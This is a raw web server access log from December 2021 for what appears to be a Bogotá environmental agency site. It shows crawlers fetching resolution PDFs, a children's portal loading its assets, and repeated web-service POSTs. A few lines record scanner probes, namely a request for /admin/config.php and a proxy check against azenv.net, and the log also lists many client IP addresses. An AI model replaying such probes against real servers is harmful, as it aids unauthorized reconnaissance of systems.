186.102.16.131 - - [26/Dec/2021:16:35:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19gdiMrMxYneLm1YCQMAYVAVusKrTCZ2Xd74NgisL+JZgDU/N8n0en6PFqDeRP0zuFAxHd+B63gKFO6Lo0o89iWbVSgOR56HETA8BvGnlkSs3nRRtBKwwxgQxlq6QE2v+woxNZyo0aNQ6amGakEtaFvlQ+reluRr7e0U4zNo3jEy9yB3OFK43Y92+LxCkhUNUIJEBQIDuvVfw==&u=U2FsdGVkX1/EL+aycPTcqngLsockSEksxQk1gBvF5eu3gMt5rpvh1Ajina+nlyR/&y=U2FsdGVkX189EydXohUXlvzHV/13q4QBneQpdwlvklQBiO4p0P1ZpbRrkta9pfxR HTTP/1.1" 200 25
186.102.16.131 - - [26/Dec/2021:16:35:17 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+4oqfiQZF8tdsYgs+XUAfobxO3kPlSHhz1X/6GAJqLDDDmfduXFq1uDFXRz/nINGSFx8/i5xrQE9a6mTQEkpQ2DPKyHRgI+yoXhYMlIhCEECa9+VRaXr2p0hfE0IAN6CNhTEPab2DK3TqMLbh4/WrKqkXC1ADxxWO8SALQ457bE1L3qt2sx8H2sHRgeiKpiQAmVUTyQ08epQ==&u=U2FsdGVkX1/EL+aycPTcqngLsockSEksxQk1gBvF5eu3gMt5rpvh1Ajina+nlyR/&y=U2FsdGVkX189EydXohUXlvzHV/13q4QBneQpdwlvklQBiO4p0P1ZpbRrkta9pfxR HTTP/1.1" 200 24
95.108.213.42 - - [26/Dec/2021:16:35:21 -0500] "-" 408 -
5.255.253.181 - - [26/Dec/2021:16:35:51 -0500] "-" 408 -
216.245.221.92 - - [26/Dec/2021:16:35:52 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.186 - - [26/Dec/2021:16:36:51 -0500] "-" 408 -
201.245.192.253 - - [26/Dec/2021:16:36:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
5.45.207.96 - - [26/Dec/2021:16:37:51 -0500] "-" 408 -
66.249.75.113 - - [26/Dec/2021:16:38:55 -0500] "-" 408 -
207.46.13.52 - - [26/Dec/2021:16:39:13 -0500] "GET /bla/resoluciones/autos%202010/4558.pdf HTTP/1.1" 200 144139
207.46.13.52 - - [26/Dec/2021:16:39:34 -0500] "GET /bla/resoluciones/autos%202010/1905.pdf HTTP/1.1" 200 2920
213.180.203.14 - - [26/Dec/2021:16:39:51 -0500] "-" 408 -
194.93.0.40 - - [26/Dec/2021:16:40:25 -0500] "-" 408 -
216.245.221.92 - - [26/Dec/2021:16:40:52 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.39 - - [26/Dec/2021:16:42:51 -0500] "-" 408 -
201.245.192.253 - - [26/Dec/2021:16:42:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
207.46.13.52 - - [26/Dec/2021:16:43:10 -0500] "GET /portaldeninos/humedal-el-burro-2/ HTTP/1.1" 200 80942
201.245.192.253 - - [26/Dec/2021:16:43:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45663
34.147.70.127 - - [26/Dec/2021:16:44:00 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [26/Dec/2021:16:43:50 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45528
216.245.221.92 - - [26/Dec/2021:16:45:52 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [26/Dec/2021:16:46:10 -0500] "GET /bla/resoluciones/autos%202010/3472.pdf HTTP/1.1" 200 473940
201.245.192.253 - - [26/Dec/2021:16:46:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
216.245.221.92 - - [26/Dec/2021:16:50:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:16:52:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
40.77.167.55 - - [26/Dec/2021:16:54:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%202901%20AL%203000/RESOLUCION%202906%20DE%202007.pdf HTTP/1.1" 304 -
173.252.95.4 - - [26/Dec/2021:16:54:30 -0500] "GET /programese-este-fin-de-semana-para-las-ferias-de-servicios-y-realice-sus-tramites-ambientales.html HTTP/1.1" 206 866
216.245.221.92 - - [26/Dec/2021:16:55:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:16:56:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
173.252.95.26 - - [26/Dec/2021:16:58:26 -0500] "GET /tarantulas-cucarachas-y-un-escorpion-fueron-incautadas-en-el-aeropuerto-el-dorado-su-destino-era-alemania.html HTTP/1.1" 206 931
207.46.13.88 - - [26/Dec/2021:16:58:55 -0500] "GET /bla/resoluciones/autos%202010/3476.pdf HTTP/1.1" 200 351011
173.252.107.17 - - [26/Dec/2021:16:59:04 -0500] "GET /images/humedales-agua-14-diciembre.jpg HTTP/1.1" 200 111054
173.252.107.22 - - [26/Dec/2021:16:59:12 -0500] "GET /images/musgo-planta-flora-bogota-27-noviembre.jpg HTTP/1.1" 200 65902
191.156.71.104 - - [26/Dec/2021:17:00:16 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [26/Dec/2021:17:00:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:17:02:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
207.46.13.52 - - [26/Dec/2021:17:04:17 -0500] "GET /bla/resoluciones/autos%202010/2475.pdf HTTP/1.1" 200 101077
216.245.221.92 - - [26/Dec/2021:17:05:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:17:06:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
186.28.209.11 - - [26/Dec/2021:17:10:14 -0500] "GET /portaldeninos/ HTTP/1.1" 200 154346
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/smartslider.min.css?1558968666 HTTP/1.1" 200 19594
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
186.28.209.11 - - [26/Dec/2021:17:10:15 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/n2.min.js?1528383544 HTTP/1.1" 200 3495
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-frontend.min.js?1563274780 HTTP/1.1" 200 76980
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/plugins/type/simple/simple/dist/smartslider-simple-type-frontend.min.js?1563274780 HTTP/1.1" 200 18726
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/nextend/media/dist/nextend-webfontloader.min.js?1528383544 HTTP/1.1" 200 12329
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/smart-slider-3/library/media/dist/smartslider-frontend.min.js?1563274780 HTTP/1.1" 200 128256
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
186.28.209.11 - - [26/Dec/2021:17:10:16 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
186.28.209.11 - - [26/Dec/2021:17:10:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
186.28.209.11 - - [26/Dec/2021:17:10:17 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
186.28.209.11 - - [26/Dec/2021:17:10:17 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
186.28.209.11 - - [26/Dec/2021:17:10:17 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-videos-ni%C3%B1os.png HTTP/1.1" 200 10502
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-humedales-ni%C3%B1os.png HTTP/1.1" 200 13361
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-la-Conejera.jpg HTTP/1.1" 200 202147
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Torca-y-Guaymaral.jpg HTTP/1.1" 200 448572
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Tunjo.jpg HTTP/1.1" 200 561428
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Tibanica.jpg HTTP/1.1" 200 152887
186.28.209.11 - - [26/Dec/2021:17:10:18 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Juan-Amarillo.jpg HTTP/1.1" 200 179884
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-La-Vaca.jpg HTTP/1.1" 200 197748
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Cordoba.jpg HTTP/1.1" 200 190285
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Capellania.jpg HTTP/1.1" 200 170582
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-El-Burro.jpg HTTP/1.1" 200 158205
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Jaboque.jpg HTTP/1.1" 200 154626
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Salitre.jpg HTTP/1.1" 200 439750
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Meandro-del-Say.jpg HTTP/1.1" 200 329496
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-La-Isla.jpg HTTP/1.1" 200 392691
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Humedal-Techo.jpg HTTP/1.1" 200 143206
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/ig.jpg HTTP/1.1" 200 11470
186.28.209.11 - - [26/Dec/2021:17:10:20 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/yt.jpg HTTP/1.1" 200 10577
186.28.209.11 - - [26/Dec/2021:17:10:20 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/tw.jpg HTTP/1.1" 200 11056
186.28.209.11 - - [26/Dec/2021:17:10:20 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/mapa-humedales-de-bogot%C3%A1-1.jpg HTTP/1.1" 200 1170768
186.28.209.11 - - [26/Dec/2021:17:10:20 -0500] "GET /portaldeninos/wp-json/pum/v1/analytics/?event=open&pid=1126&_cache=1640556411376 HTTP/1.1" 204 -
186.28.209.11 - - [26/Dec/2021:17:10:19 -0500] "GET /portaldeninos/wp-content/uploads/2020/02/Santa-Mar%C3%ADa-del-Lago-principal-1.jpg HTTP/1.1" 200 6220511
216.245.221.92 - - [26/Dec/2021:17:10:52 -0500] "HEAD / HTTP/1.1" 200 -
45.238.181.195 - - [26/Dec/2021:17:11:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [26/Dec/2021:17:11:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
186.28.209.11 - - [26/Dec/2021:17:12:10 -0500] "GET /portaldeninos/wp-content/uploads/2021/10/videoplayback-7.mp4 HTTP/1.1" 206 3766505
186.28.209.11 - - [26/Dec/2021:17:12:10 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 19207221
186.28.209.11 - - [26/Dec/2021:17:12:17 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 2803389
186.28.209.11 - - [26/Dec/2021:17:12:37 -0500] "GET /portaldeninos/wp-content/uploads/2021/10/videoplayback-7.mp4 HTTP/1.1" 206 522467
66.249.75.111 - - [26/Dec/2021:17:14:22 -0500] "-" 408 -
157.55.39.106 - - [26/Dec/2021:17:15:50 -0500] "GET /bla/resoluciones/autos%202010/2132.pdf HTTP/1.1" 200 1272305
216.245.221.92 - - [26/Dec/2021:17:15:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:17:16:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
173.252.95.20 - - [26/Dec/2021:17:18:43 -0500] "GET /secretaria-de-ambiente-avanza-con-la-implementacion-de-viveros-y-sistemas-de-recoleccion-de-agua-lluvia-en-humedales.html HTTP/1.1" 206 1031
167.248.133.43 - - [26/Dec/2021:17:20:21 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [26/Dec/2021:17:20:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:17:21:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
2.57.121.38 - - [26/Dec/2021:17:23:31 -0500] "GET /admin/config.php HTTP/1.1" 404 1013
201.245.192.253 - - [26/Dec/2021:17:23:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46127
201.245.192.253 - - [26/Dec/2021:17:23:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45544
201.245.192.253 - - [26/Dec/2021:17:25:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
216.245.221.92 - - [26/Dec/2021:17:25:52 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.113 - - [26/Dec/2021:17:27:56 -0500] "GET /bla/resoluciones/autos%202010/6934.pdf HTTP/1.1" 200 149813
207.46.13.113 - - [26/Dec/2021:17:28:46 -0500] "GET /bla/resoluciones/autos%202010/0172.pdf HTTP/1.1" 200 359964
87.250.224.68 - - [26/Dec/2021:17:29:22 -0500] "-" 408 -
216.245.221.92 - - [26/Dec/2021:17:30:52 -0500] "HEAD / HTTP/1.1" 200 -
186.155.33.174 - - [26/Dec/2021:17:32:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [26/Dec/2021:17:32:33 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
201.245.192.253 - - [26/Dec/2021:17:33:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46127
201.245.192.253 - - [26/Dec/2021:17:33:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45544
216.245.221.92 - - [26/Dec/2021:17:35:52 -0500] "HEAD / HTTP/1.1" 200 -
213.180.203.84 - - [26/Dec/2021:17:37:22 -0500] "-" 408 -
66.249.75.111 - - [26/Dec/2021:17:37:33 -0500] "-" 408 -
207.46.13.113 - - [26/Dec/2021:17:39:36 -0500] "GET /bla/resoluciones/autos%202010/6947.pdf HTTP/1.1" 200 205865
91.237.241.254 - - [26/Dec/2021:17:39:58 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [26/Dec/2021:17:40:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:17:41:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
201.245.192.253 - - [26/Dec/2021:17:43:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46127
201.245.192.253 - - [26/Dec/2021:17:43:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45544
186.154.39.69 - - [26/Dec/2021:17:45:29 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [26/Dec/2021:17:45:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.75.109 - - [26/Dec/2021:17:45:53 -0500] "-" 408 -
34.91.108.94 - - [26/Dec/2021:17:45:55 -0500] "GET / HTTP/1.1" 200 319
190.158.204.49 - - [26/Dec/2021:17:46:52 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [26/Dec/2021:17:46:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
186.31.58.173 - - [26/Dec/2021:17:48:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [26/Dec/2021:17:50:52 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.91 - - [26/Dec/2021:17:51:19 -0500] "GET /bla/resoluciones/autos%202010/6555.pdf HTTP/1.1" 200 140845
201.245.192.253 - - [26/Dec/2021:17:50:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
216.245.221.92 - - [26/Dec/2021:17:55:52 -0500] "HEAD / HTTP/1.1" 200 -
186.80.130.200 - - [26/Dec/2021:17:57:25 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.214.206.161 - - [26/Dec/2021:17:58:15 -0500] "OPTIONS / HTTP/1.1" 200 -
216.245.221.92 - - [26/Dec/2021:18:00:52 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:18:02:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115043
186.80.52.59 - - [26/Dec/2021:18:03:36 -0500] "GET /en-esta-navidad-bogota-esta-mejorando-con-mas-espacios-verdes-para-el-disfrute-de-la-ciudadania.html HTTP/1.1" 200 1114
208.100.26.248 - - [26/Dec/2021:18:04:54 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [26/Dec/2021:18:05:52 -0500] "HEAD / HTTP/1.1" 200 -
191.102.196.232 - - [26/Dec/2021:18:06:12 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 12684
191.102.196.232 - - [26/Dec/2021:18:06:29 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 744610
201.245.192.253 - - [26/Dec/2021:18:05:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
191.102.196.232 - - [26/Dec/2021:18:06:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/2354.pdf HTTP/1.1" 200 537817
191.102.196.232 - - [26/Dec/2021:18:07:21 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2017%2F HTTP/1.1" 200 273223
200.122.228.61 - - [26/Dec/2021:18:07:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 12684
200.122.228.61 - - [26/Dec/2021:18:07:43 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
200.122.228.61 - - [26/Dec/2021:18:07:43 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
200.122.228.61 - - [26/Dec/2021:18:07:43 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
200.122.228.61 - - [26/Dec/2021:18:07:43 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.122.228.61 - - [26/Dec/2021:18:07:52 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
200.122.228.61 - - [26/Dec/2021:18:07:52 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
200.122.228.61 - - [26/Dec/2021:18:07:52 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 271559
200.122.228.61 - - [26/Dec/2021:18:08:44 -0500] "GET /BLA/resoluciones/AUTOS%202010/5280.pdf HTTP/1.1" 200 183809
198.98.49.124 - - [26/Dec/2021:18:08:55 -0500] "GET / HTTP/1.1" 200 319
200.122.228.61 - - [26/Dec/2021:18:09:15 -0500] "GET /BLA/resoluciones/AUTOS%202010/5279.pdf HTTP/1.1" 200 193289
200.122.228.61 - - [26/Dec/2021:18:09:39 -0500] "GET /BLA/resoluciones/AUTOS%202010/5284.pdf HTTP/1.1" 200 186357
66.220.149.29 - - [26/Dec/2021:18:09:39 -0500] "GET /images/pieza-global-day-5-octubre.jpg HTTP/1.1" 200 242505
200.122.228.61 - - [26/Dec/2021:18:10:10 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 12684
200.122.228.61 - - [26/Dec/2021:18:10:16 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2010%2F HTTP/1.1" 200 1307798
200.122.228.61 - - [26/Dec/2021:18:10:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/5980.pdf HTTP/1.1" 200 2098289
185.53.90.24 - - [26/Dec/2021:18:10:48 -0500] "GET http://azenv.net/ HTTP/1.1" 200 319
216.245.221.92 - - [26/Dec/2021:18:10:51 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.106 - - [26/Dec/2021:18:12:55 -0500] "GET /bla/resoluciones/autos%202010/0156.pdf HTTP/1.1" 200 180097
201.245.192.253 - - [26/Dec/2021:18:13:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
216.245.221.92 - - [26/Dec/2021:18:15:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [26/Dec/2021:18:16:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115027
186.31.49.253 - - [26/Dec/2021:18:17:35 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12175
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
